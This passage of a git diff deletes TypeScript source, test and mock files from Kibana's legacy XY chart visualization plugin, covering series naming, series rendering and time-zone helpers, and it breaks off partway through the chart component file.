isStacked: true, -} as unknown as XYChartSeriesIdentifier; - -const splitAccessors = new Map(); -splitAccessors.set('col-1-3', 'Weather Delay'); - -const seriesSplitAccessors = { - specId: 'histogram-col-2-1', - seriesKeys: ['Weather Delay', 'col-2-1'], - yAccessor: 'col-2-1', - splitAccessors, - smVerticalAccessorValue: '__ECH_DEFAULT_SINGLE_PANEL_SM_VALUE__', - 
smHorizontalAccessorValue: '__ECH_DEFAULT_SINGLE_PANEL_SM_VALUE__', - groupId: '__pseudo_stacked_group-ValueAxis-1__', - seriesType: 'bar', - isStacked: true, -} as unknown as XYChartSeriesIdentifier; - -describe('getSeriesNameFn', () => { - it('returns the y aspects title if splitAccessors are empty array', () => { - const getSeriesName = getSeriesNameFn(aspects, false); - expect(getSeriesName(series)).toStrictEqual('Count'); - }); - - it('returns the y aspects title if splitAccessors are empty array but mupliple flag is set to true', () => { - const getSeriesName = getSeriesNameFn(aspects, true); - expect(getSeriesName(series)).toStrictEqual('Count'); - }); - - it('returns the correct string for multiple set to false and given split accessors', () => { - const aspectsSplitSeries = { - ...aspects, - y: [ - { - accessor: 'col-2-1', - column: 2, - title: 'Count', - format: { - id: 'number', - }, - aggType: 'count', - aggId: '1', - params: {}, - }, - ], - }; - const getSeriesName = getSeriesNameFn(aspectsSplitSeries, false); - expect(getSeriesName(seriesSplitAccessors)).toStrictEqual('Weather Delay'); - }); - - it('returns the correct string for multiple set to true and given split accessors', () => { - const aspectsSplitSeries = { - ...aspects, - y: [ - { - accessor: 'col-2-1', - column: 2, - title: 'Count', - format: { - id: 'number', - }, - aggType: 'count', - aggId: '1', - params: {}, - }, - ], - }; - const getSeriesName = getSeriesNameFn(aspectsSplitSeries, true); - expect(getSeriesName(seriesSplitAccessors)).toStrictEqual('Weather Delay: Count'); - }); -}); diff --git a/src/plugins/vis_types/xy/public/utils/get_series_name_fn.ts b/src/plugins/vis_types/xy/public/utils/get_series_name_fn.ts deleted file mode 100644 index 8019e36c1e6d5..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/get_series_name_fn.ts +++ /dev/null 
@@ -1,48 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import { memoize } from 'lodash';
-
-import { XYChartSeriesIdentifier, SeriesName } from '@elastic/charts';
-
-import { VisConfig } from '../types';
-
-function getSplitValues(
- splitAccessors: XYChartSeriesIdentifier['splitAccessors'],
- seriesAspects?: VisConfig['aspects']['series']
-) {
- if (splitAccessors.size < 1) {
- return [];
- }
-
- const splitValues: Array = [];
- splitAccessors.forEach((value, key) => {
- const split = (seriesAspects ?? []).find(({ accessor }) => accessor === key);
- splitValues.push(split?.formatter ? split?.formatter(value) : value);
- });
- return splitValues;
-}
-
-export const getSeriesNameFn = (aspects: VisConfig['aspects'], multipleY = false) =>
- memoize(({ splitAccessors, yAccessor }: XYChartSeriesIdentifier): SeriesName => {
- const splitValues = getSplitValues(splitAccessors, aspects.series);
- const yAccessorTitle = aspects.y.find(({ accessor }) => accessor === yAccessor)?.title ?? null;
-
- if (!yAccessorTitle) {
- return null;
- }
-
- if (multipleY) {
- if (splitValues.length === 0) {
- return yAccessorTitle;
- }
- return `${splitValues.join(' - ')}: ${yAccessorTitle}`;
- }
-
- return splitValues.length > 0 ? splitValues.join(' - ') : yAccessorTitle;
- });
diff --git a/src/plugins/vis_types/xy/public/utils/get_series_params.test.ts b/src/plugins/vis_types/xy/public/utils/get_series_params.test.ts
deleted file mode 100644
index 21b2dac5da322..0000000000000
--- a/src/plugins/vis_types/xy/public/utils/get_series_params.test.ts
+++ /dev/null
@@ -1,64 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-import type { AggConfigs } from '@kbn/data-plugin/public';
-import type { SeriesParam } from '../types';
-import { getSeriesParams } from './get_series_params';
-import { sampleAreaVis } from '../sample_vis.test.mocks';
-
-describe('getSeriesParams', () => {
- it('returns correct params', () => {
- const seriesParams = getSeriesParams(
- sampleAreaVis.data.aggs as unknown as AggConfigs,
- sampleAreaVis.params.seriesParams as unknown as SeriesParam[],
- 'metric',
- 'ValueAxis-1'
- );
- expect(seriesParams).toStrictEqual([
- {
- circlesRadius: 5,
- data: {
- id: '1',
- label: 'Total quantity',
- },
- drawLinesBetweenPoints: true,
- interpolate: 'linear',
- mode: 'stacked',
- show: 'true',
- showCircles: true,
- type: 'area',
- valueAxis: 'ValueAxis-1',
- },
- ]);
- });
-
- it('returns default params if no params provided', () => {
- const seriesParams = getSeriesParams(
- sampleAreaVis.data.aggs as unknown as AggConfigs,
- [],
- 'metric',
- 'ValueAxis-1'
- );
- expect(seriesParams).toStrictEqual([
- {
- circlesRadius: 1,
- data: {
- id: '1',
- label: 'Total quantity',
- },
- drawLinesBetweenPoints: true,
- interpolate: 'linear',
- lineWidth: 2,
- mode: 'normal',
- show: true,
- showCircles: true,
- type: 'line',
- valueAxis: 'ValueAxis-1',
- },
- ]);
- });
-});
diff --git a/src/plugins/vis_types/xy/public/utils/get_time_zone.tsx b/src/plugins/vis_types/xy/public/utils/get_time_zone.tsx
deleted file mode 100644
index 2d63eebbdc3e2..0000000000000
--- a/src/plugins/vis_types/xy/public/utils/get_time_zone.tsx
+++ /dev/null
@@ -1,25 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import moment from 'moment';
-
-import { getUISettings } from '../services';
-
-/**
- * Get timeZone from uiSettings
- */
-export function getTimeZone() {
- const uiSettings = getUISettings();
- if (uiSettings.isDefault('dateFormat:tz')) {
- const detectedTimeZone = moment.tz.guess();
- if (detectedTimeZone) return detectedTimeZone;
- else return moment().format('Z');
- } else {
- return uiSettings.get('dateFormat:tz', 'Browser');
- }
-}
diff --git a/src/plugins/vis_types/xy/public/utils/index.tsx b/src/plugins/vis_types/xy/public/utils/index.tsx
deleted file mode 100644
index d68a6e8068fa8..0000000000000
--- a/src/plugins/vis_types/xy/public/utils/index.tsx
+++ /dev/null
@@ -1,16 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-export { renderAllSeries } from './render_all_series';
-export { getTimeZone } from './get_time_zone';
-export { getLegendActions } from './get_legend_actions';
-export { getSeriesNameFn } from './get_series_name_fn';
-export { getXDomain, getAdjustedDomain } from './domain';
-export { getColorPicker } from './get_color_picker';
-export { getXAccessor } from './accessors';
-export { getAllSeries } from './get_all_series';
diff --git a/src/plugins/vis_types/xy/public/utils/render_all_series.test.mocks.ts b/src/plugins/vis_types/xy/public/utils/render_all_series.test.mocks.ts
deleted file mode 100644
index 4c51d8cad64e4..0000000000000
--- a/src/plugins/vis_types/xy/public/utils/render_all_series.test.mocks.ts
+++ /dev/null
@@ -1,529 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { AxisMode, VisConfig } from '../types'; - -export const getVisConfig = (): VisConfig => { - return { - markSizeRatio: 5.3999999999999995, - fittingFunction: 'linear', - detailedTooltip: true, - isTimeChart: true, - showCurrentTime: false, - showValueLabel: false, - enableHistogramMode: true, - tooltip: { - type: 'vertical', - }, - aspects: { - x: { - accessor: 'col-0-2', - column: 0, - title: 'order_date per minute', - format: { - id: 'date', - params: { - pattern: 'HH:mm', - }, - }, - aggType: 'date_histogram', - aggId: '2', - params: { - date: true, - intervalESUnit: 'm', - intervalESValue: 1, - interval: 60000, - format: 'HH:mm', - }, - }, - y: [ - { - accessor: 'col-1-3', - column: 1, - title: 'Average products.base_price', - format: { - id: 'number', - }, - aggType: 'avg', - aggId: '3', - params: {}, - }, - ], - }, - xAxis: { - id: 'CategoryAxis-1', - position: 'bottom', - show: true, - style: { - axisTitle: { - visible: true, - }, - tickLabel: { - visible: true, - rotation: 0, - }, - }, - groupId: 'CategoryAxis-1', - title: 'order_date per minute', - ticks: { - show: true, - showOverlappingLabels: false, - showDuplicates: false, - }, - grid: { - show: false, - }, - scale: { - type: 'time', - }, - integersOnly: false, - }, - yAxes: [ - { - id: 'ValueAxis-1', - position: 'left', - show: true, - style: { - axisTitle: { - visible: true, - }, - tickLabel: { - visible: true, - rotation: 0, - }, - }, - groupId: 'ValueAxis-1', - title: 'Avg of products.base_price', - ticks: { - show: true, - rotation: 0, - showOverlappingLabels: true, - showDuplicates: true, - }, - grid: { - show: 
false, - }, - scale: { - mode: AxisMode.Percentage, - type: 'linear', - }, - domain: { - min: NaN, - max: NaN, - }, - integersOnly: false, - }, - ], - legend: { - show: true, - position: 'right', - }, - rotation: 0, - thresholdLine: { - color: '#E7664C', - show: false, - value: 10, - width: 1, - groupId: 'ValueAxis-1', - }, - }; -}; - -export const getVisConfigMutipleYaxis = (): VisConfig => { - return { - markSizeRatio: 5.3999999999999995, - fittingFunction: 'linear', - detailedTooltip: true, - isTimeChart: true, - showCurrentTime: false, - showValueLabel: false, - enableHistogramMode: true, - tooltip: { - type: 'vertical', - }, - aspects: { - x: { - accessor: 'col-0-2', - column: 0, - title: 'order_date per minute', - format: { - id: 'date', - params: { - pattern: 'HH:mm', - }, - }, - aggType: 'date_histogram', - aggId: '2', - params: { - date: true, - intervalESUnit: 'm', - intervalESValue: 1, - interval: 60000, - format: 'HH:mm', - }, - }, - y: [ - { - accessor: 'col-1-3', - column: 1, - title: 'Average products.base_price', - format: { - id: 'number', - }, - aggType: 'avg', - aggId: '3', - params: {}, - }, - { - accessor: 'col-1-2', - column: 1, - title: 'Average products.taxful_price', - format: { - id: 'number', - }, - aggType: 'avg', - aggId: '33', - params: {}, - }, - ], - }, - xAxis: { - id: 'CategoryAxis-1', - position: 'bottom', - show: true, - style: { - axisTitle: { - visible: true, - }, - tickLabel: { - visible: true, - rotation: 0, - }, - }, - groupId: 'CategoryAxis-1', - title: 'order_date per minute', - ticks: { - show: true, - showOverlappingLabels: false, - showDuplicates: false, - }, - grid: { - show: false, - }, - scale: { - type: 'time', - }, - integersOnly: false, - }, - yAxes: [ - { - id: 'ValueAxis-1', - position: 'left', - show: true, - style: { - axisTitle: { - visible: true, - }, - tickLabel: { - visible: true, - rotation: 0, - }, - }, - groupId: 'ValueAxis-1', - title: 'Avg of products.base_price', - ticks: { - show: true, - rotation: 
0, - showOverlappingLabels: true, - showDuplicates: true, - }, - grid: { - show: false, - }, - scale: { - mode: AxisMode.Normal, - type: 'linear', - }, - domain: { - min: NaN, - max: NaN, - }, - integersOnly: false, - }, - ], - legend: { - show: true, - position: 'right', - }, - rotation: 0, - thresholdLine: { - color: '#E7664C', - show: false, - value: 10, - width: 1, - groupId: 'ValueAxis-1', - }, - }; -}; - -export const getVisConfigPercentiles = (): VisConfig => { - return { - markSizeRatio: 5.3999999999999995, - fittingFunction: 'linear', - detailedTooltip: true, - isTimeChart: true, - showCurrentTime: false, - showValueLabel: false, - enableHistogramMode: true, - tooltip: { - type: 'vertical', - }, - aspects: { - x: { - accessor: 'col-0-2', - column: 0, - title: 'order_date per minute', - format: { - id: 'date', - params: { - pattern: 'HH:mm', - }, - }, - aggType: 'date_histogram', - aggId: '2', - params: { - date: true, - intervalESUnit: 'm', - intervalESValue: 1, - interval: 60000, - format: 'HH:mm', - }, - }, - y: [ - { - accessor: 'col-1-3.1', - column: 1, - title: '1st percentile of products.base_price', - format: { - id: 'number', - }, - aggType: 'percentiles', - aggId: '3.1', - params: {}, - }, - { - accessor: 'col-2-3.5', - column: 2, - title: '5th percentile of products.base_price', - format: { - id: 'number', - }, - aggType: 'percentiles', - aggId: '3.5', - params: {}, - }, - { - accessor: 'col-3-3.25', - column: 3, - title: '25th percentile of products.base_price', - format: { - id: 'number', - }, - aggType: 'percentiles', - aggId: '3.25', - params: {}, - }, - { - accessor: 'col-4-3.50', - column: 4, - title: '50th percentile of products.base_price', - format: { - id: 'number', - }, - aggType: 'percentiles', - aggId: '3.50', - params: {}, - }, - { - accessor: 'col-5-3.75', - column: 5, - title: '75th percentile of products.base_price', - format: { - id: 'number', - }, - aggType: 'percentiles', - aggId: '3.75', - params: {}, - }, - { - accessor: 
'col-6-3.95', - column: 6, - title: '95th percentile of products.base_price', - format: { - id: 'number', - }, - aggType: 'percentiles', - aggId: '3.95', - params: {}, - }, - { - accessor: 'col-7-3.99', - column: 7, - title: '99th percentile of products.base_price', - format: { - id: 'number', - }, - aggType: 'percentiles', - aggId: '3.99', - params: {}, - }, - ], - }, - xAxis: { - id: 'CategoryAxis-1', - position: 'bottom', - show: true, - style: { - axisTitle: { - visible: true, - }, - tickLabel: { - visible: true, - rotation: 0, - }, - }, - groupId: 'CategoryAxis-1', - title: 'order_date per minute', - ticks: { - show: true, - showOverlappingLabels: false, - showDuplicates: false, - }, - grid: { - show: false, - }, - scale: { - type: 'time', - }, - integersOnly: false, - }, - yAxes: [ - { - id: 'ValueAxis-1', - position: 'left', - show: true, - style: { - axisTitle: { - visible: true, - }, - tickLabel: { - visible: true, - rotation: 0, - }, - }, - groupId: 'ValueAxis-1', - title: 'Percentiles of products.base_price', - ticks: { - show: true, - rotation: 0, - showOverlappingLabels: true, - showDuplicates: true, - }, - grid: { - show: false, - }, - scale: { - mode: AxisMode.Normal, - type: 'linear', - }, - domain: { - min: NaN, - max: NaN, - }, - integersOnly: false, - }, - ], - legend: { - show: true, - position: 'right', - }, - rotation: 0, - thresholdLine: { - color: '#E7664C', - show: false, - value: 10, - width: 1, - groupId: 'ValueAxis-1', - }, - }; -}; - -export const getPercentilesData = () => { - return [ - { - 'col-0-2': 1610961900000, - 'col-1-3.1': 11.9921875, - 'col-2-3.5': 11.9921875, - 'col-3-3.25': 11.9921875, - 'col-4-3.50': 38.49609375, - 'col-5-3.75': 65, - 'col-6-3.95': 65, - 'col-7-3.99': 65, - }, - { - 'col-0-2': 1610962980000, - 'col-1-3.1': 28.984375000000004, - 'col-2-3.5': 28.984375, - 'col-3-3.25': 28.984375, - 'col-4-3.50': 30.9921875, - 'col-5-3.75': 41.5, - 'col-6-3.95': 50, - 'col-7-3.99': 50, - }, - { - 'col-0-2': 1610963280000, - 
'col-1-3.1': 11.9921875, - 'col-2-3.5': 11.9921875, - 'col-3-3.25': 11.9921875, - 'col-4-3.50': 12.9921875, - 'col-5-3.75': 13.9921875, - 'col-6-3.95': 13.9921875, - 'col-7-3.99': 13.9921875, - }, - { - 'col-0-2': 1610964180000, - 'col-1-3.1': 11.9921875, - 'col-2-3.5': 11.9921875, - 'col-3-3.25': 14.9921875, - 'col-4-3.50': 15.98828125, - 'col-5-3.75': 24.984375, - 'col-6-3.95': 85, - 'col-7-3.99': 85, - }, - { - 'col-0-2': 1610964420000, - 'col-1-3.1': 11.9921875, - 'col-2-3.5': 11.9921875, - 'col-3-3.25': 11.9921875, - 'col-4-3.50': 23.99609375, - 'col-5-3.75': 42, - 'col-6-3.95': 42, - 'col-7-3.99': 42, - }, - { - 'col-0-2': 1610964600000, - 'col-1-3.1': 10.9921875, - 'col-2-3.5': 10.992187500000002, - 'col-3-3.25': 10.9921875, - 'col-4-3.50': 12.4921875, - 'col-5-3.75': 13.9921875, - 'col-6-3.95': 13.9921875, - 'col-7-3.99': 13.9921875, - }, - ]; -}; diff --git a/src/plugins/vis_types/xy/public/utils/render_all_series.test.tsx b/src/plugins/vis_types/xy/public/utils/render_all_series.test.tsx deleted file mode 100644 index 6be7c31cb1060..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/render_all_series.test.tsx +++ /dev/null 
@@ -1,187 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { shallow } from 'enzyme'; -import { AreaSeries, BarSeries, CurveType } from '@elastic/charts'; -import { DatatableRow } from '@kbn/expressions-plugin/public'; -import { renderAllSeries } from './render_all_series'; -import { - getVisConfig, - getVisConfigPercentiles, - getPercentilesData, - getVisConfigMutipleYaxis, -} from './render_all_series.test.mocks'; -import { SeriesParam, VisConfig } from '../types'; - -const defaultSeriesParams = [ - { - data: { - id: '3', - label: 'Label', - }, - drawLinesBetweenPoints: true, - interpolate: 'linear', - lineWidth: 2, - mode: 'stacked', - show: true, - showCircles: true, - circlesRadius: 3, - type: 'area', - valueAxis: 'ValueAxis-1', - }, -] as SeriesParam[]; - -const defaultData = [ - { - 'col-0-2': 1610960220000, - 'col-1-3': 26.984375, - }, - { - 'col-0-2': 1610961300000, - 'col-1-3': 30.99609375, - }, - { - 'col-0-2': 1610961900000, - 'col-1-3': 38.49609375, - }, - { - 'col-0-2': 1610962980000, - 'col-1-3': 35.2421875, - }, -]; - -describe('renderAllSeries', function () { - const getAllSeries = (visConfig: VisConfig, params: SeriesParam[], data: DatatableRow[]) => { - return renderAllSeries( - visConfig, - params, - data, - jest.fn(), - jest.fn(), - 'Europe/Athens', - 'col-0-2', - [] - ); - }; - - it('renders an area Series and not a bar series if type is area', () => { - const renderSeries = getAllSeries(getVisConfig(), defaultSeriesParams, defaultData); - const wrapper = shallow(
{renderSeries}
); - expect(wrapper.find(AreaSeries).length).toBe(1); - expect(wrapper.find(BarSeries).length).toBe(0); - }); - - it('renders a bar Series in case of histogram', () => { - const barSeriesParams = [{ ...defaultSeriesParams[0], type: 'histogram' }]; - - const renderBarSeries = renderAllSeries( - getVisConfig(), - barSeriesParams as SeriesParam[], - defaultData, - jest.fn(), - jest.fn(), - 'Europe/Athens', - 'col-0-2', - [] - ); - const wrapper = shallow(
{renderBarSeries}
); - expect(wrapper.find(AreaSeries).length).toBe(0); - expect(wrapper.find(BarSeries).length).toBe(1); - }); - - it('renders percentage data for percentage mode', () => { - const barSeriesParams = [{ ...defaultSeriesParams[0], type: 'histogram', mode: 'percentage' }]; - const config = getVisConfig(); - - const renderBarSeries = renderAllSeries( - config, - barSeriesParams as SeriesParam[], - defaultData, - jest.fn(), - jest.fn(), - 'Europe/Athens', - 'col-0-2', - [] - ); - const wrapper = shallow(
{renderBarSeries}
); - expect(wrapper.find(BarSeries).length).toBe(1); - expect(wrapper.find(BarSeries).prop('stackMode')).toEqual('percentage'); - expect(wrapper.find(BarSeries).prop('data')).toEqual([ - { - 'col-0-2': 1610960220000, - 'col-1-3': 1, - }, - { - 'col-0-2': 1610961300000, - 'col-1-3': 1, - }, - { - 'col-0-2': 1610961900000, - 'col-1-3': 1, - }, - { - 'col-0-2': 1610962980000, - 'col-1-3': 1, - }, - ]); - }); - - it('renders the correct yAccessors for not percentile aggs', () => { - const renderSeries = getAllSeries(getVisConfig(), defaultSeriesParams, defaultData); - const wrapper = shallow(
{renderSeries}
); - expect(wrapper.find(AreaSeries).prop('yAccessors')).toEqual(['col-1-3']); - }); - - it('renders the correct yAccessors for multiple yAxis', () => { - const mutipleYAxisConfig = getVisConfigMutipleYaxis(); - const renderMutipleYAxisSeries = renderAllSeries( - mutipleYAxisConfig, - defaultSeriesParams as SeriesParam[], - defaultData, - jest.fn(), - jest.fn(), - 'Europe/Athens', - 'col-0-2', - [] - ); - const wrapper = shallow(
{renderMutipleYAxisSeries}
); - expect(wrapper.find(AreaSeries).prop('yAccessors')).toEqual(['col-1-3']); - }); - - it('renders the correct yAccessors for percentile aggs', () => { - const percentilesConfig = getVisConfigPercentiles(); - const percentilesData = getPercentilesData(); - const renderPercentileSeries = renderAllSeries( - percentilesConfig, - defaultSeriesParams as SeriesParam[], - percentilesData, - jest.fn(), - jest.fn(), - 'Europe/Athens', - 'col-0-2', - [] - ); - const wrapper = shallow(
{renderPercentileSeries}
); - expect(wrapper.find(AreaSeries).prop('yAccessors')).toEqual([ - 'col-1-3.1', - 'col-2-3.5', - 'col-3-3.25', - 'col-4-3.50', - 'col-5-3.75', - 'col-6-3.95', - 'col-7-3.99', - ]); - }); - - it('defaults the CurveType to linear', () => { - const renderSeries = getAllSeries(getVisConfig(), defaultSeriesParams, defaultData); - const wrapper = shallow(
{renderSeries}
); - expect(wrapper.find(AreaSeries).prop('curve')).toEqual(CurveType.LINEAR); - }); -}); diff --git a/src/plugins/vis_types/xy/public/utils/render_all_series.tsx b/src/plugins/vis_types/xy/public/utils/render_all_series.tsx deleted file mode 100644 index 0e3787a27560d..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/render_all_series.tsx +++ /dev/null 
@@ -1,222 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { - AreaSeries, - CurveType, - BarSeries, - XYChartSeriesIdentifier, - SeriesColorAccessorFn, - SeriesName, - Accessor, - AccessorFn, - ColorVariant, - LabelOverflowConstraint, -} from '@elastic/charts'; - -import { DatatableRow } from '@kbn/expressions-plugin/public'; - -import { ChartType } from '../../common'; -import { SeriesParam, VisConfig, Aspect } from '../types'; -import { isValidSeriesForDimension } from './accessors'; -import { computePercentageData } from './compute_percentage_data'; - -/** - * Matches vislib curve to elastic charts - * @param type curve type - */ -const getCurveType = (type?: 'linear' | 'cardinal' | 'step-after'): CurveType => { - switch (type) { - case 'cardinal': - return CurveType.CURVE_MONOTONE_X; - case 'step-after': - return CurveType.CURVE_STEP_AFTER; - case 'linear': - default: - return CurveType.LINEAR; - } -}; - -/** - * Renders chart Line, Area or Bar series - * @param config - * @param seriesParams - * @param data - * @param getSeriesName - * @param getSeriesColor - */ -export const renderAllSeries = ( - { - aspects, - yAxes, - xAxis, - showValueLabel, - enableHistogramMode, - fittingFunction, - fillOpacity, - }: VisConfig, - seriesParams: SeriesParam[], - data: DatatableRow[], - getSeriesName: (series: XYChartSeriesIdentifier) => SeriesName, - getSeriesColor: SeriesColorAccessorFn, - timeZone: string, - xAccessor: Accessor | AccessorFn, - splitSeriesAccessors: Array -) => { - let percentageModeComputedData: DatatableRow[] = []; - yAxes.forEach((yAxis) => { - const scale = yAxis.scale; - // find the series that are 
positioned on this axis - const series = seriesParams.filter((seriesParam) => seriesParam.valueAxis === yAxis.groupId); - const yAspects: Aspect[] = []; - series.forEach((seriesParam) => { - const aggId = seriesParam.data.id; - const accessorsInSeries = aspects.y.filter((aspect) => aspect.aggId === aggId); - yAspects.push(...accessorsInSeries); - }); - const yAccessors = yAspects.map((aspect) => { - return aspect.accessor; - }) as string[]; - if (scale.mode === 'percentage') { - const splitChartAccessor = aspects.splitColumn?.accessor || aspects.splitRow?.accessor; - percentageModeComputedData = computePercentageData( - data, - xAccessor, - yAccessors, - splitChartAccessor - ); - } - }); - - return seriesParams.map( - ({ - show, - valueAxis: groupId, - data: { id: paramId }, - lineWidth: strokeWidth, - showCircles, - circlesRadius, - drawLinesBetweenPoints, - mode, - interpolate, - type, - }) => { - const yAspects = aspects.y.filter((aspect) => isValidSeriesForDimension(paramId, aspect)); - if (!show || !yAspects.length) { - return null; - } - const yAccessors = yAspects.map((aspect) => aspect.accessor) as string[]; - - const id = `${type}-${yAccessors[0]}`; - const yAxisScale = yAxes.find(({ groupId: axisGroupId }) => axisGroupId === groupId)?.scale; - - const isStacked = mode === 'stacked'; - - const stackMode = yAxisScale?.mode === 'normal' ? undefined : yAxisScale?.mode; - // needed to seperate stacked and non-stacked bars into unique pseudo groups - const pseudoGroupId = isStacked ? `__pseudo_stacked_group-${groupId}__` : groupId; - // set domain of stacked groups to use actual groupId not pseudo groupdId - const useDefaultGroupDomain = isStacked ? groupId : undefined; - - switch (type) { - case ChartType.Histogram: - return ( - - ); - - case ChartType.Area: - case ChartType.Line: - const markSizeAccessor = showCircles ? aspects.z?.accessor ?? 
undefined : undefined; - - return ( - - ); - default: - // Error: unsupported chart type - return null; - } - } - ); -}; diff --git a/src/plugins/vis_types/xy/public/vis_component.tsx b/src/plugins/vis_types/xy/public/vis_component.tsx deleted file mode 100644 index a744841601a67..0000000000000 --- a/src/plugins/vis_types/xy/public/vis_component.tsx +++ /dev/null 
@@ -1,413 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { memo, useCallback, useEffect, useMemo, useRef, useState } from 'react'; -import type { PaletteRegistry } from '@kbn/coloring'; -import { - Chart, - ElementClickListener, - XYChartElementEvent, - Position, - XYChartSeriesIdentifier, - BrushEndListener, - RenderChangeListener, - ScaleType, - AccessorFn, - Accessor, - XYBrushEvent, - Placement, -} from '@elastic/charts'; - -import { compact } from 'lodash'; -import { - getFilterFromChartClickEventFn, - getFilterFromSeriesFn, - LegendToggle, - getBrushFromChartBrushEventFn, - ClickTriggerEvent, - useActiveCursor, -} from '@kbn/charts-plugin/public'; -import { Datatable, IInterpreterRenderHandlers } from '@kbn/expressions-plugin/public'; -import { - DEFAULT_LEGEND_SIZE, - LegendSizeToPixels, - PersistedState, -} from '@kbn/visualizations-plugin/public'; -import { VisParams } from './types'; -import { - getAdjustedDomain, - getXDomain, - getTimeZone, - renderAllSeries, - getSeriesNameFn, - getLegendActions, - getColorPicker, - getXAccessor, - getAllSeries, -} from './utils'; -import { XYAxis, XYEndzones, XYCurrentTime, XYSettings, XYThresholdLine } from './components'; -import { getConfig } from './config'; -import { getThemeService, getDataActions, getPalettesService, getActiveCursor } from './services'; -import { ChartType } from '../common'; - -import './_chart.scss'; -import { - COMPLEX_SPLIT_ACCESSOR, - getComplexAccessor, - getSplitSeriesAccessorFnMap, -} from './utils/accessors'; -import { ChartSplit } from './chart_split'; - -export interface VisComponentProps { - visParams: VisParams; - visData: Datatable; - uiState: 
PersistedState; - fireEvent: IInterpreterRenderHandlers['event']; - renderComplete: IInterpreterRenderHandlers['done']; - syncColors: boolean; - syncTooltips: boolean; - useLegacyTimeAxis: boolean; -} - -export type VisComponentType = typeof VisComponent; - -const VisComponent = (props: VisComponentProps) => { - const [showLegend, setShowLegend] = useState(() => { - // TODO: Check when this bwc can safely be removed - const bwcLegendStateDefault = - props.visParams.addLegend == null ? true : props.visParams.addLegend; - return props.uiState?.get('vis.legendOpen', bwcLegendStateDefault) as boolean; - }); - const [palettesRegistry, setPalettesRegistry] = useState(null); - const chartRef = useRef(null); - - const handleCursorUpdate = useActiveCursor(getActiveCursor(), chartRef, { - datatables: [props.visData], - }); - - const onRenderChange = useCallback( - (isRendered) => { - if (isRendered) { - props.renderComplete(); - } - }, - [props] - ); - - useEffect(() => { - const fetchPalettes = async () => { - const palettes = await getPalettesService().getPalettes(); - setPalettesRegistry(palettes); - }; - fetchPalettes(); - }, []); - - const handleFilterClick = useCallback( - ( - visData: Datatable, - xAccessor: Accessor | AccessorFn, - splitSeriesAccessors: Array, - splitChartAccessor?: Accessor | AccessorFn - ): ElementClickListener => { - const splitSeriesAccessorFnMap = getSplitSeriesAccessorFnMap(splitSeriesAccessors); - return (elements) => { - if (xAccessor !== null) { - const event = getFilterFromChartClickEventFn( - visData, - xAccessor, - splitSeriesAccessorFnMap, - splitChartAccessor - )(elements as XYChartElementEvent[]); - props.fireEvent(event); - } - }; - }, - [props] - ); - - const handleBrush = useCallback( - ( - visData: Datatable, - xAccessor: Accessor | AccessorFn, - isInterval: boolean - ): BrushEndListener | undefined => { - if (xAccessor !== null && isInterval) { - return (brushArea) => { - const event = getBrushFromChartBrushEventFn( - visData, - 
xAccessor - )(brushArea as XYBrushEvent); - props.fireEvent(event); - }; - } - }, - [props] - ); - - const getFilterEventData = useCallback( - ( - visData: Datatable, - xAccessor: Accessor | AccessorFn, - splitSeriesAccessors: Array - ) => { - const splitSeriesAccessorFnMap = getSplitSeriesAccessorFnMap(splitSeriesAccessors); - return (series: XYChartSeriesIdentifier): ClickTriggerEvent | null => { - if (xAccessor !== null) { - return getFilterFromSeriesFn(visData)(series, splitSeriesAccessorFnMap); - } - - return null; - }; - }, - [] - ); - - const handleFilterAction = useCallback( - (event: ClickTriggerEvent, negate = false) => { - props.fireEvent({ - ...event, - data: { - ...event.data, - negate, - }, - }); - }, - [props] - ); - - const canFilter = async (event: ClickTriggerEvent | null): Promise => { - if (!event) { - return false; - } - const filters = await getDataActions().createFiltersFromValueClickAction(event.data); - return Boolean(filters.length); - }; - - const toggleLegend = useCallback(() => { - setShowLegend((value) => { - const newValue = !value; - if (props.uiState?.set) { - props.uiState.set('vis.legendOpen', newValue); - } - return newValue; - }); - }, [props.uiState]); - - const setColor = useCallback( - (newColor: string | null, seriesLabel: string | number) => { - const colors = props.uiState?.get('vis.colors') || {}; - if (colors[seriesLabel] === newColor || !newColor) { - delete colors[seriesLabel]; - } else { - 